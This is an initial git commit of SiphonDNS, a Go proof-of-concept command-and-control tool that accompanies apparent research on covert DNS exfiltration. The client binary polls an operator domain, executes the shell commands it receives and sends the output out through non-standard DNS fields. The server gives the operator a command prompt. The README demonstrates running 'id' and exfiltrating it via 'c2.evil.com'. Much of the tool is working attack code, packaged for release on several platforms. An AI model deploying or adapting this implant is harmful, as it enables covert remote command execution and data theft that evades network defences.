Initial commit

Author: ttpreport

.github/workflows/release.yml

@@ -0,0 +1,33 @@
+name: goreleaser
+
+on:
+  push:
+    tags:
+    - '*'
+
+permissions:
+  contents: write
+
+jobs:
+  goreleaser:
+    runs-on: ubuntu-latest
+    steps:
+      -
+        name: Checkout
+        uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      -
+        name: Set up Go
+        uses: actions/setup-go@v4
+        with:
+          go-version: '1.23.5'
+      -
+        name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v4
+        with:
+          distribution: goreleaser
+          version: latest
+          args: release --clean
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.gitignore

@@ -0,0 +1,2 @@
+.vscode/
+dist/

.goreleaser.yaml

@@ -0,0 +1,61 @@
+project_name: siphondns
+
+builds:
+  - main: ./cmd/server
+    id: "server"
+    binary: server
+    env: [CGO_ENABLED=0]
+    flags:
+      - -trimpath
+      - -mod=vendor
+    goos:
+      - linux
+      - darwin
+      - windows
+    goarch:
+      - 386
+      - amd64
+      - arm64
+    goarm:
+      - 6
+      - 7
+
+  - main: ./cmd/client
+    id: "client"
+    binary: client
+    env: [CGO_ENABLED=0]
+    flags:
+      - -trimpath
+      - -mod=vendor
+    goos:
+      - linux
+      - darwin
+      - windows
+    goarch:
+      - 386
+      - amd64
+      - arm64
+    goarm:
+      - 6
+      - 7
+
+archives:
+  - 
+    id: "server"
+    builds: ['server']
+    name_template: "{{ .ProjectName }}-{{ .Binary }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}{{ if .Mips }}_{{ .Mips }}{{ end }}"
+    format: binary
+
+  - 
+    id: "client"
+    builds: ['client']
+    name_template: "{{ .ProjectName }}-{{ .Binary }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}{{ if .Mips }}_{{ .Mips }}{{ end }}"
+    format: binary
+
+release:
+  github:
+  disable: false
+
+checksum:
+  name_template: "{{ .ProjectName }}_checksums.txt"
+  algorithm: sha256

README.md

@@ -0,0 +1,44 @@
+# SiphonDNS
+
+A PoC for techniques described in [this research](http://ttp.report/evasion/tools/2025/02/03/siphondns-covert-dns-exfiltration.html).
+
+Implements data exfiltration via non-standard sections of DNS. 
+
+Server:
+```
+$ ./siphondns-server -method ecs
+Starting DNS server
+cmd> id
+Command received
+Receiving data............................................................................
+
+Response:
+ uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),118(wireshark),121(bluetooth),134(scanner),141(kaboxer)
+```
+
+Client:
+```
+./siphondns-client -domain 'c2.evil.com' -method ecs -resolver 8.8.8.8:53
+Polling....OK
+Executing command: id ... OK
+Sending: 13.3.7.0 ... OK
+Sending: 101.74.120.0 ... OK
+Sending: 99.121.122.0 ... OK
+Sending: 70.79.66.0 ... OK
+Sending: 68.69.77.0 ... OK
+Sending: 104.101.71.0 ... OK
+Sending: 101.85.49.0 ... OK
+Sending: 68.97.107.0 ... OK
+Sending: 111.115.52.0 ... OK
+Sending: 71.120.89.0 ... OK
+
+...[SNIP]...
+
+Sending: 104.74.119.0 ... OK
+Sending: 65.65.47.0 ... OK
+Sending: 47.57.56.0 ... OK
+Sending: 57.107.71.0 ... OK
+Sending: 1.84.0.0 ... OK
+Sending: 7.3.13.0 ... OK
+Done in 108 requests.
+```

cmd/client/main.go

@@ -0,0 +1,81 @@
+package main
+
+import (
+	"errors"
+	"flag"
+	"fmt"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/kek/pek/internal/protocol"
+)
+
+func executeCmd(command string) ([]byte, error) {
+	args := strings.Fields(command)
+	cmd := exec.Command(args[0], args[1:]...)
+
+	if errors.Is(cmd.Err, exec.ErrDot) {
+		cmd.Err = nil
+	}
+
+	result, err := cmd.Output()
+	if err != nil {
+		return []byte(err.Error()), nil
+	}
+
+	return result, nil
+}
+
+func main() {
+	domain := flag.String("domain", "", "server domain")
+	resolver := flag.String("resolver", "8.8.8.8", "resolver to use")
+	method := flag.String("method", "ecs", "channel type [ecs, cookie, qtype, dau]")
+	interval := flag.Int("interval", 1000, "milliseconds between attempts to fetch a command from server")
+	delay := flag.Int("delay", 200, "milliseconds between requests for data transfer")
+	flag.Parse()
+
+	if *domain == "" {
+		fmt.Printf("-domain is missing")
+		return
+	}
+
+	var proto protocol.ProtocolClient
+
+	switch *method {
+	case "ecs":
+		proto = protocol.NewEcsProtoClient(*resolver, *domain, time.Duration(*delay)*time.Millisecond)
+	case "cookie":
+		proto = protocol.NewCookieProtoClient(*resolver, *domain, time.Duration(*delay)*time.Millisecond)
+	case "qtype":
+		proto = protocol.NewQtypeProtoClient(*resolver, *domain, time.Duration(*delay)*time.Millisecond)
+	case "dau":
+		proto = protocol.NewDauProtoClient(*resolver, *domain, time.Duration(*delay)*time.Millisecond)
+	default:
+		fmt.Printf("-method can only be one of [ecs, cookie, qtype, dau]")
+		return
+	}
+
+	fmt.Printf("Polling")
+	for {
+		fmt.Printf(".")
+		time.Sleep(time.Duration(*interval) * time.Millisecond)
+
+		cmd, err := proto.FetchCmd()
+		if err != nil {
+			continue
+		}
+
+		if cmd != "" {
+			fmt.Printf("OK\nExecuting command: %s ... ", cmd)
+			cmdResult, err := executeCmd(cmd)
+			if err != nil {
+				continue
+			}
+			fmt.Printf("OK\n")
+
+			proto.Send(cmdResult)
+			fmt.Printf("Polling")
+		}
+	}
+}

cmd/server/main.go

@@ -0,0 +1,53 @@
+package main
+
+import (
+	"bufio"
+	"flag"
+	"fmt"
+	"os"
+
+	"github.com/kek/pek/internal/protocol"
+)
+
+func main() {
+	method := flag.String("method", "ecs", "channel type [ecs, cookie, qtype, dau]")
+	flag.Parse()
+
+	var proto protocol.ProtocolServer
+
+	switch *method {
+	case "ecs":
+		proto = protocol.NewEcsProtoServer()
+	case "cookie":
+		proto = protocol.NewCookieProtoServer()
+	case "qtype":
+		proto = protocol.NewQtypeProtoServer()
+	case "dau":
+		proto = protocol.NewDauProtoServer()
+	default:
+		fmt.Printf("-method can only be one of [ecs, cookie, qtype, dau]")
+		return
+	}
+
+	fmt.Println("Starting DNS server")
+
+	go func() {
+		err := proto.Serve()
+		if err != nil {
+			panic(fmt.Sprintf("Failed to start server: %s\n", err.Error()))
+		}
+	}()
+
+	for {
+		scanner := bufio.NewScanner(os.Stdin)
+		fmt.Print("cmd> ")
+
+		if scanner.Scan() {
+			input := scanner.Text()
+			proto.SendCmd(input)
+		}
+
+		response := proto.FetchData()
+		fmt.Printf("Response:\n %s\n", string(response))
+	}
+}

go.mod

@@ -0,0 +1,13 @@
+module github.com/kek/pek
+
+go 1.23.5
+
+require github.com/miekg/dns v1.1.62
+
+require (
+	golang.org/x/mod v0.18.0 // indirect
+	golang.org/x/net v0.27.0 // indirect
+	golang.org/x/sync v0.7.0 // indirect
+	golang.org/x/sys v0.22.0 // indirect
+	golang.org/x/tools v0.22.0 // indirect
+)

go.sum

@@ -0,0 +1,12 @@
+github.com/miekg/dns v1.1.62 h1:cN8OuEF1/x5Rq6Np+h1epln8OiyPWV+lROx9LxcGgIQ=
+github.com/miekg/dns v1.1.62/go.mod h1:mvDlcItzm+br7MToIKqkglaGhlFMHJ9DTNNWONWXbNQ=
+golang.org/x/mod v0.18.0 h1:5+9lSbEzPSdWkH32vYPBwEpX8KwDbM52Ud9xBUvNlb0=
+golang.org/x/mod v0.18.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c=
+golang.org/x/net v0.27.0 h1:5K3Njcw06/l2y9vpGCSdcxWOYHOUk3dVNGDXN+FvAys=
+golang.org/x/net v0.27.0/go.mod h1:dDi0PyhWNoiUOrAS8uXv/vnScO4wnHQO4mj9fn/RytE=
+golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M=
+golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
+golang.org/x/sys v0.22.0 h1:RI27ohtqKCnwULzJLqkv897zojh5/DwS/ENaMzUOaWI=
+golang.org/x/sys v0.22.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
+golang.org/x/tools v0.22.0 h1:gqSGLZqv+AI9lIQzniJ0nZDRG5GBPsSi+DRNHWNz6yA=
+golang.org/x/tools v0.22.0/go.mod h1:aCwcsjqvq7Yqt6TNyX7QMU2enbQ/Gt0bo6krSeEri+c=

internal/codec/codec.go

@@ -0,0 +1,28 @@
+package codec
+
+import (
+	"encoding/hex"
+	"fmt"
+)
+
+type Codec[T any] interface {
+	Compress(data []byte) ([]byte, error)
+	Decompress(compressedData []byte) ([]byte, error)
+	Encode(data []byte) []T
+	Decode(data []T) ([]byte, error)
+	EncodeCmd(data string) string
+	DecodeCmd(data string) (string, error)
+	GetEpilogue() T
+	GetPrologue() T
+}
+
+type HexCmdEncoder struct{}
+
+func (*HexCmdEncoder) EncodeCmd(data string) string {
+	return fmt.Sprintf("%s.", hex.EncodeToString([]byte(data)))
+}
+
+func (*HexCmdEncoder) DecodeCmd(data string) (string, error) {
+	decoded, err := hex.DecodeString(data[:len(data)-1])
+	return string(decoded), err
+}